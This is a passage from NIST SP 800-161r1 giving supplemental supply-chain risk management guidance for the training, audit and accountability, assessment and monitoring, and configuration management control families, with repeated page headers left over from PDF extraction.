training on what C-SCRM requirements, clauses, and evaluation factors are necessary to include when
conducting procurement and how to incorporate C-SCRM into each acquisition phase. Similar enhanced
training requirements should be tailored for personnel responsible for conducting threat assessments.
Responding to threats and identified risks requires training in counterintelligence awareness and reporting.
Enterprises should ensure that developers receive training on secure development practices as well as the
use of vulnerability scanning tools. Enterprises should require their prime contractors to implement this
control and flow down this requirement to relevant sub-tier contractors. Departments and agencies should
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
79
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
refer to Appendix F to implement this guidance in accordance with Executive Order 14028, Improving the
Nation’s Cybersecurity.
Control Enhancement(s):
SECURITY TRAINING | PHYSICAL SECURITY CONTROLS
Supplemental C-SCRM Guidance: C-SCRM is impacted by a number of physical security mechanisms
and procedures within the supply chain, such as manufacturing, shipping, receiving, physical access to
facilities, inventory management, and warehousing. Enterprise and system integrator personnel who
provide development and operational support to the enterprise should receive training on how to
handle these physical security mechanisms and on the associated cybersecurity risks throughout the
supply chain.
Level(s): 2
ROLE-BASED TRAINING | COUNTERINTELLIGENCE TRAINING
Supplemental C-SCRM Guidance: Public sector enterprises should provide specialized
counterintelligence awareness training that enables its resources to collect, interpret, and act upon a
range of data sources that may signal a foreign adversary’s presence in the supply chain. At a
minimum, counterintelligence training should cover known red flags, key information sharing
concepts, and reporting requirements.
Level(s): 2
AT-4
TRAINING RECORDS
Supplemental C-SCRM Guidance: Enterprises should maintain documentation for C-SCRM-specific
training, especially with regard to key personnel in acquisitions and counterintelligence.
Level(s): 2
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
80
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
FAMILY: AUDIT AND ACCOUNTABILITY
[FIPS 200] specifies the Audit and Accountability minimum security requirement as follows:
Organizations must: (i) create, protect, and retain information system audit records to
the extent needed to enable the monitoring, analysis, investigation, and reporting of
unlawful, unauthorized, or inappropriate information system activity; and (ii) ensure
that the actions of individual information system users can be uniquely traced to those
users so they can be held accountable for their actions.
Audit and accountability controls for C-SCRM provide information that is useful in the event of
a supply chain cybersecurity incident or compromise. Enterprises should ensure that they
designate and audit cybersecurity supply chain-relevant events within their information system
boundaries using appropriate audit mechanisms (e.g., system logs, Intrusion Detection System
[IDS] logs, firewall logs, paper reports, forms, clipboard checklists, digital records). These audit
mechanisms should also be configured to work within a reasonable time frame, as defined by
enterprise policy. Enterprises may encourage their system suppliers, developers, system
integrators, external system service providers, and other ICT/OT-related service providers to do
the same and may include requirements for such monitoring in agreements. However, enterprises
should not deploy audit mechanisms on systems outside of their enterprise boundary, including
those of suppliers, developers, system integrators, external system service providers, and other
ICT/OT-related service providers.
AU-1
POLICY AND PROCEDURES
Supplemental C-SCRM Guidance: Enterprises must designate a specific official to manage the
development, documentation, and dissemination of the audit and accountability policy and procedures to
include auditing of the supply chain information systems and network. The audit and accountability policy
and procedures should appropriately address tracking activities and their availability for other various
supply chain activities, such as configuration management. Suppliers, developers, system integrators,
external system service providers, and other ICT/OT-related service providers activities should not be
included in such a policy unless those functions are performed within the acquirer’s supply chain
information systems and network. Audit and accountability policy procedures should appropriately address
supplier audits as a way to examine the quality of a particular supplier and the risk they present to the
enterprise and the enterprise’s supply chain.
Level(s): 1, 2, 3
AU-2
EVENT LOGGING
Supplemental C-SCRM Guidance: An observable occurrence within the information system or supply
chain network should be identified as a supply chain auditable event based on the enterprise’s SDLC
context and requirements. Auditable events may include software/hardware changes, failed attempts to
access supply chain information systems, or the movement of source code. Information on such events
should be captured by appropriate audit mechanisms and be traceable and verifiable. Information captured
may include the type of event, date/time, length, and the frequency of occurrence. Among other things,
auditing may help detect misuse of the supply chain information systems or network caused by insider
threats. Logs are a key resource when identifying operational trends and long-term problems. As such,
enterprises should incorporate reviewing logs at the contract renewal point for vendors to determine
whether there is a systemic problem. Enterprises should require their prime contractors to implement this
control and flow down this requirement to relevant sub-tier contractors. Departments and agencies should
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
81
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
refer to Appendix F to implement this guidance in accordance with Executive Order 14028, Improving the
Nation’s Cybersecurity.
Level(s): 1, 2, 3
AU-3
CONTENT OF AUDIT RECORDS
Supplemental C-SCRM Guidance: The audit records of a supply chain event should be securely handled
and maintained in a manner that conforms to record retention requirements and preserves the integrity of
the findings and the confidentiality of the record information and its sources as appropriate. In certain
instances, such records may be used in administrative or legal proceedings. Enterprises should require their
prime contractors to implement this control and flow down this requirement to relevant sub-tier contractors.
Departments and agencies should refer to Appendix F to implement this guidance in accordance with
Executive Order 14028, Improving the Nation’s Cybersecurity.
Level(s): 1, 2, 3
AU-6
AUDIT REVIEW, ANALYSIS, AND REPORTING
Supplemental C-SCRM Guidance: The enterprise should ensure that both supply chain and information
security auditable events are appropriately filtered and correlated for analysis and reporting. For example, if
new maintenance or a patch upgrade is recognized to have an invalid digital signature, the identification of
the patch arrival qualifies as a supply chain auditable event, while an invalid signature is an information
security auditable event. The combination of these two events may provide information valuable to C-
SCRM. The enterprise should adjust the level of audit record review based on the risk changes (e.g., active
threat intel, risk profile) on a specific vendor. Contracts should explicitly address how audit findings will be
reported and adjudicated.
Level(s): 2, 3
Control Enhancement(s):
AUDIT REVIEW, ANALYSIS, AND REPORTING | CORRELATION WITH INFORMATION FROM NONTECHNICAL
SOURCES
Supplemental C-SCRM Guidance: In a C-SCRM context, non-technical sources include changes to the
enterprise’s security or operational policy, changes to the procurement or contracting processes, and
notifications from suppliers, developers, system integrators, external system service providers, and
other ICT/OT-related service providers regarding plans to update, enhance, patch, or retire/dispose of a
system/component.
Level(s): 3
AU-10 NON-REPUDIATION
Supplemental C-SCRM Guidance: Enterprises should implement non-repudiation techniques to protect the
originality and integrity of both information systems and the supply chain network. Examples of what may
require non-repudiation include supply chain metadata that describes the components, supply chain
communication, and delivery acceptance information. For information systems, examples may include
patch or maintenance upgrades for software as well as component replacements in a large hardware system.
Verifying that such components originate from the OEM is part of non-repudiation.
Level(s): 3
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
82
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
Control Enhancement(s):
NON-REPUDIATION | ASSOCIATION OF IDENTITIES
Supplemental C-SCRM Guidance: This enhancement helps traceability in the supply chain and
facilitates the accuracy of provenance.
Level(s): 2
NON-REPUDIATION | VALIDATE BINDING OF INFORMATION PRODUCER IDENTITY
Supplemental C-SCRM Guidance: This enhancement validates the relationship of provenance and a
component within the supply chain. Therefore, it ensures integrity of provenance.
Level(s): 2, 3
NON-REPUDIATION | CHAIN OF CUSTODY
Supplemental C-SCRM Guidance: Chain of custody is fundamental to provenance and traceability in
the supply chain. It also helps the verification of system and component integrity.
Level(s): 2, 3
AU-12 AUDIT RECORD GENERATION
Supplemental C-SCRM Guidance: Enterprises should ensure that audit record generation mechanisms are
in place to capture all relevant supply chain auditable events. Examples of such events include component
version updates, component approvals from acceptance testing results, logistics data-capturing inventory,
or transportation information. Enterprises should require their prime contractors to implement this control
and flow down this requirement to relevant sub-tier contractors. Departments and agencies should refer to
Appendix F to implement this guidance in accordance with Executive Order 14028, Improving the Nation’s
Cybersecurity.
Level(s): 2, 3
AU-13 MONITORING FOR INFORMATION DISCLOSURE
Supplemental C-SCRM Guidance: Within the C-SCRM context, information disclosure may occur via
multiple avenues, including open source information. For example, supplier-provided errata may reveal
information about an enterprise’s system that increases the risk to that system. Enterprises should ensure
that monitoring is in place for contractor systems to detect the unauthorized disclosure of any data and that
contract language includes a requirement that the vendor will notify the enterprise, in accordance with
enterprise-defined time frames and as soon as possible in the event of any potential or actual unauthorized
disclosure. Enterprises should require their prime contractors to implement this control and flow down this
requirement to relevant sub-tier contractors. Departments and agencies should refer to Appendix F to
implement this guidance in accordance with Executive Order 14028, Improving the Nation’s Cybersecurity.
Level(s): 2, 3
AU-14 SESSION AUDIT
Supplemental C-SCRM Guidance: Enterprises should include non-federal contract employees in session
audits to identify security risks in the supply chain. Enterprises should require their prime contractors to
implement this control and flow down this requirement to relevant sub-tier contractors. Departments and
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
83
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
agencies should refer to Appendix F to implement this guidance in accordance with Executive Order
14028, Improving the Nation’s Cybersecurity.
Level(s): 2, 3
AU-16 CROSS-ORGANIZATIONAL AUDIT LOGGING
Supplemental C-SCRM Guidance: In a C-SCRM context, this control includes the enterprise’s use of
system integrator or external service provider infrastructure. Enterprises should add language to contracts
on coordinating audit information requirements and information exchange agreements with vendors.
Level(s): 2, 3
Control Enhancement(s):
CROSS-ORGANIZATIONAL AUDIT LOGGING | SHARING OF AUDIT INFORMATION
Supplemental C-SCRM Guidance: Whether managing a distributed audit environment or an audit data-
sharing environment between enterprises and its system integrators or external services providers,
enterprises should establish a set of requirements for the process of sharing audit information. In the
case of the system integrator and external service provider and the enterprise, a service-level agreement
of the type of audit data required versus what can be provided must be agreed to in advance to ensure
that the enterprise obtains the relevant audit information needed to ensure that appropriate protections
are in place to meet its mission operation protection needs. Ensure that coverage of both the
information systems and supply chain network are addressed for the collection and sharing of audit
information. Enterprises should require their prime contractors to implement this control and flow
down this requirement to relevant sub-level contractors.
Level(s): 2, 3
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
84
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
FAMILY: ASSESSMENT, AUTHORIZATION, AND MONITORING
[FIPS 200] specifies the Certification, Accreditation, and Security Assessments minimum
security requirement as follows:
Organizations must: (i) periodically assess the security controls in organizational
information systems to determine if the controls are effective in their application; (ii)
develop and implement plans of action designed to correct deficiencies and reduce or
eliminate vulnerabilities in organizational information systems; (iii) authorize the
operation of organizational information systems and any associated information system
connections; and (iv) monitor information system security controls on an ongoing basis
to ensure the continued effectiveness of the controls.
Enterprises should integrate C-SCRM – including the supply chain risk management process
and the use of relevant controls defined in this publication – into ongoing security assessment
and authorization activities. This includes activities to assess and authorize an enterprise’s
information systems, as well as external assessments of suppliers, developers, system
integrators, external system service providers, and other ICT/OT-related service providers,
where appropriate. Supply chain aspects include documentation, the tracking of chain of
custody and system interconnections within and between enterprises, the verification of supply
chain cybersecurity training, the verification of suppliers’ claims of conformance to security,
product/component integrity, and validation tools and techniques for non-invasive approaches
to detecting counterfeits or malware (e.g., Trojans) using inspection for genuine components,
including manual inspection techniques.
CA-1
POLICY AND PROCEDURES
Supplemental C- SCRM Guidance: Integrate the development and implementation of assessment and
authorization policies and procedures for supply chain cybersecurity into the control assessment and
authorization policy and related C-SCRM Strategy/Implementation Plan(s), policies, and system-level
plans. To address cybersecurity risks throughout the supply chain, enterprises should develop a C-SCRM
policy (or, if required, integrate into existing policies) to direct C-SCRM activities for control assessment
and authorization. The C-SCRM policy should define C-SCRM roles and responsibilities within the
enterprise for conducting control assessment and authorization, any dependencies among those roles, and
the interaction among the roles. Enterprise-wide security and privacy risks should be assessed on an
ongoing basis and include supply chain risk assessment results.
Level(s): 1, 2, 3
CA-2
CONTROL ASSESSMENTS
Supplemental C-SCRM Guidance: Ensure that the control assessment plan incorporates relevant C-SCRM
controls and control enhancements. The control assessment should cover the assessment of both
information systems and the supply chain and ensure that an enterprise-relevant baseline set of controls and
control enhancements are identified and used for the assessment. Control assessments can include
information from supplier audits, reviews, and supply chain-related information. Enterprises should
develop a strategy for collecting information, including a strategy for engaging with providers on supply
chain risk assessments. Such collaboration helps enterprises leverage information from providers, reduce
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
85
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
redundancy, identify potential courses of action for risk responses, and reduce the burden on providers. C-
SCRM personnel should review the control assessment.
Level(s): 2, 3
Control Enhancement(s):
CONTROL ASSESSMENTS | SPECIALIZED ASSESSMENTS
Supplemental C-SCRM Guidance: Enterprises should use a variety of assessment techniques and
methodologies, such as continuous monitoring, insider threat assessment, and malicious user
assessment. These assessment mechanisms are context-specific and require the enterprise to
understand its supply chain and to define the required set of measures for assessing and verifying that
appropriate protections have been implemented.
Level(s): 3
CONTROL ASSESSMENTS | LEVERAGING RESULTS FROM EXTERNAL ORGANIZATIONS
Supplemental C-SCRM Guidance: For C-SCRM, enterprises should use external security assessments
for suppliers, developers, system integrators, external system service providers, and other ICT/OT-
related service providers. External assessments include certifications, third-party assessments, and – in
the federal context – prior assessments performed by other departments and agencies. Certifications
from the International Enterprise for Standardization (ISO), the National Information Assurance
Partnership (Common Criteria), and the Open Group Trusted Technology Forum (OTTF) may also be
used by non-federal and federal enterprises alike, if such certifications meet agency needs.
Level(s): 3
CA-3
INFORMATION EXCHANGE
Supplemental C-SCRM Guidance: The exchange of information or data between the system and other
systems requires scrutiny from a supply chain perspective. This includes understanding the interface
characteristics and connections of those components/systems that are directly interconnected or the data
that is shared through those components/systems with developers, system integrators, external system
service providers, other ICT/OT-related service providers, and – in some cases – suppliers. Proper service-
level agreements should be in place to ensure compliance to system information exchange requirements
defined by the enterprise, as the transfer of information between systems in different security or privacy
domains with different security or privacy policies introduces the risk that such transfers violate one or
more domain security or privacy policies. Examples of such interconnections can include:
a.
A shared development and operational environment between the enterprise and system integrator
b. Product update/patch management connection to an off-the-shelf supplier
c.
Data request and retrieval transactions in a processing system that resides on an external service
provider shared environment
Enterprises should require their prime contractors to implement this control and flow down this
requirement to relevant sub-tier contractors.
Level(s): 3
CA-5
PLAN OF ACTION AND MILESTONES
Supplemental C-SCRM Guidance: For a system-level plan of actions and milestones (POA&Ms),
enterprises need to ensure that a separate POA&M exists for C-SCRM and includes both information
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
86
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
systems and the supply chain. The C-SCRM POA&M should include tasks to be accomplished with a
recommendation for completion before or after system authorization, the resources required to accomplish
the tasks, milestones established to meet the tasks, and the scheduled completion dates for the milestones
and tasks. The enterprise should include relevant weaknesses, the impact of weaknesses on information
systems or the supply chain, any remediation to address weaknesses, and any continuous monitoring
activities in its C-SCRM POA&M. The C-SCRM POA&M should be included as part of the authorization
package.
Level(s): 2, 3
CA-6
AUTHORIZATION
Supplemental C-SCRM Guidance: Authorizing officials should include C-SCRM in authorization
decisions. To accomplish this, supply chain risks and compensating controls documented in C-SCRM Plans
or system security plans and the C-SCRM POA&M should be included in the authorization package as part
of the decision-making process. Risks should be determined and associated compensating controls selected
based on the output of criticality, threat, and vulnerability analyses. Authorizing officials may use the
guidance in Section 2 of this document as well as NISTIR 8179 to guide the assessment process.
Level(s): 1, 2, 3
CA-7
CONTINUOUS MONITORING
Supplemental C-SCRM Guidance: For C-SCRM-specific guidance on this control, see Section 2 of this
publication. Departments and agencies should refer to Appendix F to implement this guidance in
accordance with Executive Order 14028, Improving the Nation’s Cybersecurity.
Level(s): 1, 2, 3
Control Enhancement(s):
CONTINUOUS MONITORING | TREND ANALYSES
Supplemental C-SCRM Guidance: The information gathered during continuous monitoring/trend
analyses serves as input into C-SCRM decisions, including criticality analysis, vulnerability and threat
analysis, and risk assessments. It also provides information that can be used in incident response and
potentially identify a supply chain cybersecurity compromise, including an insider threat.
Level(s): 3
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
87
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
FAMILY: CONFIGURATION MANAGEMENT
[FIPS 200] specifies the Configuration Management minimum security requirement as follows:
Organizations must: (i) establish and maintain baseline configurations and inventories
of organizational information systems (including hardware, software, firmware, and
documentation) throughout the respective system development life cycles; and (ii)
establish and enforce security configuration settings for information technology
products employed in organizational information systems.
Configuration Management helps track changes made throughout the SDLC to systems,
components, and documentation within the information systems and networks. This is important
for knowing what changes were made to those systems, components, and documentation; who
made the changes; and who authorized the changes. Configuration management also provides
evidence for investigations of supply chain cybersecurity compromise when determining which
changes were authorized and which were not. Enterprises should apply configuration
management controls to their own systems and encourage the use of configuration management
controls by their suppliers, developers, system integrators, external system service providers, and
other ICT/OT-related service providers. See NISTIR 7622 for more information on
Configuration Management.
CM-1
POLICY AND PROCEDURES
Supplemental C-SCRM Guidance: Configuration management impacts nearly every aspect of the supply
chain. Configuration management is critical to the enterprise’s ability to establish the provenance of
components, including tracking and tracing them through the SDLC and the supply chain. A properly
defined and implemented configuration management capability provides greater assurance throughout the
SDLC and the supply chain that components are authentic and have not been inappropriately modified.
When defining a configuration management policy and procedures, enterprises should address the full
SDLC, including procedures for introducing and removing components to and from the enterprise’s
information system boundary. A configuration management policy should incorporate configuration items,
data retention for configuration items and corresponding metadata, and tracking of the configuration item
and its metadata. The enterprise should coordinate with suppliers, developers, system integrators, external
system service providers, and other ICT/OT-related service providers regarding the configuration
management policy.
Level(s): 1, 2, 3
CM-2
BASELINE CONFIGURATION
Supplemental C-SCRM Guidance: Enterprises should establish a baseline configuration of both the
information system and the development environment, including documenting, formally reviewing, and
securing the agreement of stakeholders. The purpose of the baseline is to provide a starting point for
tracking changes to components, code, and/or settings throughout the SDLC. Regular reviews and updates
of baseline configurations (i.e., re-baselining) are critical for traceability and provenance. The baseline
configuration must take into consideration the enterprise’s operational environment and any relevant
supplier, developer, system integrator, external system service provider, and other ICT/OT-related service
provider involvement with the organization’s information systems and networks. If the system integrator,
for example, uses the existing organization’s infrastructure, appropriate measures should be taken to
establish a baseline that reflects an appropriate set of agreed-upon criteria for access and operation.
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
88
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
Enterprises should require their prime contractors to implement this control and flow down this
requirement to relevant sub-tier contractors. Departments and agencies should refer to Appendix F to
implement this guidance in accordance with Executive Order 14028, Improving the Nation’s Cybersecurity.
Level(s): 2, 3
Control Enhancement(s):
BASELINE CONFIGURATION | DEVELOPMENT AND TEST ENVIRONMENTS
Supplemental C-SCRM Guidance: The enterprise should maintain or require the maintenance of a
baseline configuration of applicable suppliers, developers, system integrators, external system service
providers, and other ICT/OT-related service providers’ development, test (and staging, if applicable)
environments, and any configuration of interfaces.
Level(s): 2, 3
CM-3
CONFIGURATION CHANGE CONTROL
Supplemental C-SCRM Guidance: Enterprises should determine, implement, monitor, and audit
configuration settings and change controls within the information systems and networks and throughout the
SDLC. This control supports traceability for C-SCRM. The below NIST SP 800-53, Rev. 5 control
enhancements – CM-3 (1), (2), (4), and (8) – are mechanisms that can be used for C-SCRM to collect and
manage change control data. Enterprises should require their prime contractors to implement this control
and flow down this requirement to relevant sub-tier contractors. Departments and agencies should refer to
Appendix F to implement this guidance in accordance with Executive Order 14028, Improving the Nation’s
Cybersecurity.
Level(s): 2, 3
(1)
CONFIGURATION CHANGE CONTROL | AUTOMATED DOCUMENTATION, NOTIFICATION, AND
PROHIBITION OF CHANGES
Supplemental C-SCRM Guidance: Enterprises should define a set of system changes that are critical to
the protection of the information system and the underlying or interoperating systems and networks.
These changes may be defined based on a criticality analysis (including components, processes, and
functions) and where vulnerabilities exist that are not yet remediated (e.g., due to resource constraints).
The change control process should also monitor for changes that may affect an existing security
control to ensure that this control continues to function as required.
Level(s): 2, 3
(2)
CONFIGURATION CHANGE CONTROL | TESTING, VALIDATION, AND DOCUMENTATION OF
CHANGES
Supplemental C-SCRM Guidance: Test, validate, and document changes to the system before
finalizing implementation of the changes.
Level(s): 2, 3
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
89
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
(3)
CONFIGURATION CHANGE CONTROL | SECURITY AND PRIVACY REPRESENTATIVES
Supplemental C-SCRM Guidance: Require enterprise security and privacy representatives to be
members of the configuration change control function.
Level(s): 2, 3
(4)
CONFIGURATION CHANGE CONTROL | PREVENT OR RESTRICT CONFIGURATION CHANGES
Supplemental C-SCRM Guidance: Prevent or restrict changes to the configuration of the system under
enterprise-defined circumstances.
Level(s): 2, 3
CM-4
IMPACT ANALYSIS
Supplemental C-SCRM Guidance: Enterprises should take changes to the information system and
underlying or interoperable systems and networks under consideration to determine whether the impact of
these changes affects existing security controls and warrants additional or different protection to maintain
an acceptable level of cybersecurity risk throughout the supply chain. Ensure that stakeholders, such as
system engineers and system security engineers, are included in the impact analysis activities to provide
their perspectives for C-SCRM. NIST SP 800-53, Rev. 5 control enhancement CM-4 (1) is a mechanism
that can be used to protect the information system from vulnerabilities that may be introduced through the
test environment.
Level(s): 3
(1)
IMPACT ANALYSES | SEPARATE TEST ENVIRONMENTS
Analyze changes to the system in a separate test environment before implementing them into an
operational environment, and look for security and privacy impacts due to flaws, weaknesses,
incompatibility, or intentional malice.
Level(s): 3
Related Control(s): SA-11, SC-7
CM-5
ACCESS RESTRICTIONS FOR CHANGE
Supplemental C-SCRM Guidance: Enterprises should ensure that requirements regarding physical and
logical access restrictions for changes to the information systems and networks are defined and included in
the enterprise’s implementation of access restrictions. Examples include access restriction for changes to
centrally managed processes for software component updates and the deployment of updates or patches.
Level(s): 2, 3
Control Enhancements:
ACCESS RESTRICTIONS FOR CHANGE | AUTOMATED ACCESS ENFORCEMENT AND AUDIT RECORDS
Supplemental C-SCRM Guidance: Enterprises should implement mechanisms to ensure automated
access enforcement and auditing of the information system and the underlying systems and networks.
Level(s): 3
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
90
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
ACCESS RESTRICTIONS FOR CHANGE | LIMIT LIBRARY PRIVILEGES
Supplemental C-SCRM Guidance: Enterprises should note that software libraries may be considered
configuration items, access to which should be managed and controlled.
Level(s): 3
CM-6
CONFIGURATION SETTINGS
Supplemental C-SCRM Guidance: Enterprises should oversee the function of modifying configuration
settings for their information systems and networks and throughout the SDLC. Methods of oversight
include periodic verification, reporting, and review. Resulting information may be shared with various
parties that have access to, are connected to, or engage in the creation of the enterprise’s information
systems and networks on a need-to-know basis. Changes should be tested and approved before they are
implemented. Configuration settings should be monitored and audited to alert designated enterprise
personnel when a change has occurred. Enterprises should require their prime contractors to implement this
control and flow down this requirement to relevant sub-tier contractors. Departments and agencies should
refer to Appendix F to implement this guidance in accordance with Executive Order 14028, Improving the
Nation’s Cybersecurity.
Level(s): 2, 3
Control Enhancement(s):
(1)
CONFIGURATION SETTINGS | AUTOMATED MANAGEMENT, APPLICATION, AND VERIFICATION
Supplemental C-SCRM Guidance: The enterprise should, when feasible, employ automated
mechanisms to manage, apply, and verify configuration settings.
Level(s): 3
(2)
CONFIGURATION SETTINGS | RESPOND TO UNAUTHORIZED CHANGES
Supplemental C-SCRM Guidance: The enterprise should ensure that designated security or IT
personnel are alerted to unauthorized changes to configuration settings. When suppliers, developers,
system integrators, external system service providers, and other ICT/OT-related service providers are
responsible for such unauthorized changes, this qualifies as a C-SCRM incident that should be
recorded and tracked to monitor trends. For a more comprehensive view, a specific, predefined set of
C-SCRM stakeholders should assess the impact of unauthorized changes in the supply chain. When
impact is assessed, relevant stakeholders should help define and implement appropriate mitigation
strategies to ensure a comprehensive resolution.
Level(s): 3
CM-7
LEAST FUNCTIONALITY
Supplemental C-SCRM Guidance: Least functionality reduces the attack surface. Enterprises should select
components that allow the flexibility to specify and implement least functionality. Enterprises should
ensure least functionality in their information systems and networks and throughout the SDLC. NIST SP
800-53, Rev. 5 control enhancement CM-7 (9) mechanism can be used to protect information systems and
networks from vulnerabilities that may be introduced by the use of unauthorized hardware being connected
to enterprise systems. Enterprises should require their prime contractors to implement this control and flow
down this requirement to relevant sub-tier contractors. Departments and agencies should refer to Appendix
F to implement this guidance in accordance with Executive Order 14028, Improving the Nation’s
Cybersecurity.
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
91
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
Level(s): 3
Control Enhancement(s):
(1)
LEAST FUNCTIONALITY | PERIODIC REVIEW
Supplemental C-SCRM Guidance: Enterprises should require their prime contractors to implement this
control and flow down this requirement to relevant sub-tier contractors.
Level(s): 2, 3
(2)
LEAST FUNCTIONALITY | UNAUTHORIZED SOFTWARE
Supplemental C-SCRM Guidance: Enterprises should define requirements and deploy appropriate
processes to specify and detect software that is not allowed. This can be aided by defining a
requirement to, at a minimum, not use disreputable or unauthorized software. Enterprises should
require their prime contractors to implement this control and flow down this requirement to relevant
sub-tier contractors.
Level(s): 2, 3
(3)
LEAST FUNCTIONALITY | AUTHORIZED SOFTWARE
Supplemental C-SCRM Guidance: Enterprises should define requirements and deploy appropriate
processes to specify allowable software. This can be aided by defining a requirement to use only
reputable software. This can also include requirements for alerts when new software and updates to
software are introduced into the enterprise’s environment. An example of such requirements is to allow
open source software only if the code is available for an enterprise’s evaluation and determined to be
acceptable for use.
Level(s): 3
(4)
LEAST FUNCTIONALITY | CONFINED ENVIRONMENTS WITH LIMITED PRIVILEGES
Supplemental C-SCRM Guidance: The enterprise should ensure that code authentication mechanisms
such as digital signatures are implemented when executing code to assure the integrity of software,
firmware, and information on the information systems and networks.
Level(s): 2, 3
(5)
REMOTE ACCESS | PROTECTION OF MECHANISM INFORMATION
Supplemental C-SCRM Guidance: The enterprise should obtain binary or machine-executable code
directly from the OEM/developer or other acceptable, verified source.
Level(s): 3
(6)
LEAST FUNCTIONALITY | BINARY OR MACHINE EXECUTABLE CODE
Supplemental C-SCRM Guidance: When exceptions are made to use software products without
accompanying source code and with limited or no warranty because of compelling mission or
operational requirements, approval by the authorizing official should be contingent upon the enterprise
explicitly incorporating cybersecurity supply chain risk assessments as part of a broader assessment of
such software products, as well as the implementation of compensating controls to address any
identified and assessed risks.
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
92
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
Level(s): 2, 3
(7)
LEAST FUNCTIONALITY | PROHIBITING THE USE OF UNAUTHORIZED HARDWARE
Enterprises should define requirements and deploy appropriate processes to specify and detect
hardware that is not allowed. This can be aided by defining a requirement to, at a minimum, not use
disreputable or unauthorized hardware. Enterprises should require their prime contractors to implement
this control and flow down this requirement to relevant sub-tier contractors
Level(s): 2, 3
CM-8
SYSTEM COMPONENT INVENTORY
Supplemental C-SCRM Guidance: Enterprises should ensure that critical component assets within the
information systems and networks are included in the asset inventory. The inventory must also include
information for critical component accountability. Inventory information includes, for example, hardware
inventory specifications, software license information, software version numbers, component owners, and –
for networked components or devices – machine names and network addresses. Inventory specifications
may include the manufacturer, device type, model, serial number, and physical location. Enterprises should
require their prime contractors to implement this control and flow down this requirement to relevant sub-
tier contractors. Enterprises should specify the requirements and how information flow is enforced to
ensure that only the required information – and no more – is communicated to the various participants in
the supply chain. If information is subsetted downstream, there should be information about who created
the subset information. Enterprises should consider producing SBOMs for applicable and appropriate
classes of software, including purchased software, open source software, and in-house software.
Departments and agencies should refer to Appendix F for additional guidance on SBOMs in accordance
with Executive Order 14028, Improving the Nation’s Cybersecurity.
Level(s): 2, 3
Control Enhancement(s):
(1)
SYSTEM COMPONENT INVENTORY: | UPDATES DURING INSTALLATION AND REMOVAL
Supplemental C-SCRM Guidance: When installing, updating, or removing an information system,
information system component, or network component, the enterprise needs to update the inventory to
ensure traceability for tracking critical components. In addition, the information system’s configuration
needs to be updated to ensure an accurate inventory of supply chain protections and then re-baselined
accordingly.
Level(s): 3
(2)
SYSTEM COMPONENT INVENTORY | AUTOMATED MAINTENANCE
Supplemental C-SCRM Guidance: The enterprise should implement automated maintenance
mechanisms to ensure that changes to component inventory for the information systems and networks
are monitored for installation, update, and removal. When automated maintenance is performed with a
predefined frequency and with the automated collation of relevant inventory information about each
defined component, the enterprise should ensure that updates are available to relevant stakeholders for
evaluation. Predefined frequencies for data collection should be less predictable in order to reduce the
risk of an insider threat bypassing security mechanisms.
Level(s): 3
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
93
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
(3)
SYSTEM COMPONENT INVENTORY | ACCOUNTABILITY INFORMATION
Supplemental C-SCRM Guidance: The enterprise should ensure that accountability information is
collected for information system and network components. The system/component inventory
information should identify those individuals who originate an acquisition as well as intended end
users, including any associated personnel who may administer or use the system/components.
Level(s): 3
(4)
SYSTEM COMPONENT INVENTORY | ASSESSED CONFIGURATIONS AND APPROVED DEVIATIONS
Supplemental C-SCRM Guidance: Assessed configurations and approved deviations must be
documented and tracked. Any changes to the baseline configurations of information systems and
networks require a review by relevant stakeholders to ensure that the changes do not result in increased
